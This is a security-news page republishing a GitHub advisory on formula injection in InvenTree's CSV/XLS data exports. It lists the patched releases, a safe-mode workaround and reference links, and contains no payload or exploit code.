Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-7rq4-qcpw-74gq: Formula Injection in Exported Data

Impact

Datasets exported to file (e.g. CSV / XLS) are not sufficiently sanitized, to neutralize potential formula injection

Patches

  • The issue is addressed in the upcoming 0.8.0 release
  • This fix will also be back-ported to the 0.7.x branch, applied to the 0.7.2 release

Workarounds

Users exporting untrusted data should open the files in safe mode (e.g. in Microsoft Excel).

References

  • https://huntr.dev/bounties/e57c36e7-fa39-435f-944a-3a52ee066f73/
  • https://owasp.org/www-community/attacks/CSV_Injection

For more information

If you have any questions or comments about this advisory:

ghsa
#microsoft#git

Formula Injection in Exported Data

Moderate severity GitHub Reviewed Published Jun 17, 2022 in inventree/InvenTree • Updated Jun 17, 2022

ghsa: Latest News

GHSA-27wf-5967-98gx: Kubernetes kubelet arbitrary command execution